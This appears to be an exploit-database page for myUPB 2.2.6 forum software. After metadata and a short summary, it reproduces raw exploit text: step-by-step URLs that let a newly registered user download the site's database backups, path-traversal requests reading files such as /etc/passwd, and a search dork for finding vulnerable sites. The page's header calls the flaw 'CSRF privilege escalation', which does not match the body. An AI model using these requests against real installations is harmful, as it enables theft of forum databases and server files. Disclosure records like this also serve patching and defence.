header-logo
Suggest Exploit
vendor:
myUPB
by:
altbta
8,8
CVSS
HIGH
CSRF privilege escalation
352
CWE
Product Name: myUPB
Affected Version From: 2.2.6
Affected Version To: 2.2.6
Patch Exists: YES
Related CWE: N/A
CPE: a:myupb:myupb
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

myUPB <= v2.2.6 Multiple Vulnerabilities

altbta discovered two vulnerabilities in myUPB version 2.2.6. The first vulnerability is a backup exploit which allows an attacker to download the backup files of the application. The second vulnerability is a Local File Inclusion (LFI) vulnerability which allows an attacker to read arbitrary files from the server.

Mitigation:

The vendor has released a patch to address these vulnerabilities. Users are advised to upgrade to the latest version of myUPB.
Source

Exploit-DB raw data:

=============== altbta ======================

#Name: myUPB <= v2.2.6 Multiple Vulnerabilities

#Download: http://sourceforge.net/projects/textmb/files/UPB/

#Vulnerability: CSRF privilege escalation

#Tested on: 2.2.6

#Author : altbta (l_9@hotmail.com)

#Dork: "Powered by myUPB"

================= backup exploit: ==============

backup exploit:
register.php
http://localhost/upb/register.php

go too

http://localhost/upb/admin_restore.php?action=download

Download:

upbdatabackup_v2.2.6_06.21.2010.1277118622.zip
upbdatabackup_v2.2.6_06.21.2010.1277118651.zip
upbdatabackup_v2.2.6_06.21.2010.1277118703.zip
upbdatabackup_v2.2.6_06.21.2010.1277118704.zip

http://localhost/upb/admin_restore.php?action=download&file=upbdatabackup_v2.2.6_06.21.2010.1277118704.zip

================= LFI exploit: ==============
LFI exploit:

register.php
http://localhost/upb/register.php

go too


http://localhost/upb/admin_restore.php?action=download&file=../../../index.php

http://localhost/upb/admin_restore.php?action=download&file=../../../../../../../etc/passwd


#####################################################################
RoMaNcYxHaCkEr & sad hacker & ab0-3th4b & Mr.SaFa7 & Mn7oS & V ! V 3
Evil-Cod3r & asL-Sabia & ! Dr.www ! & MaKKaWi & ZaIdOoHxHaCkEr & al.bito
SnIpEr.SiTeS & R3d-D3v!L

xp10.me/xp10 & v4-team.com/cc

Navigation

Suggest Exploit

Services By CQR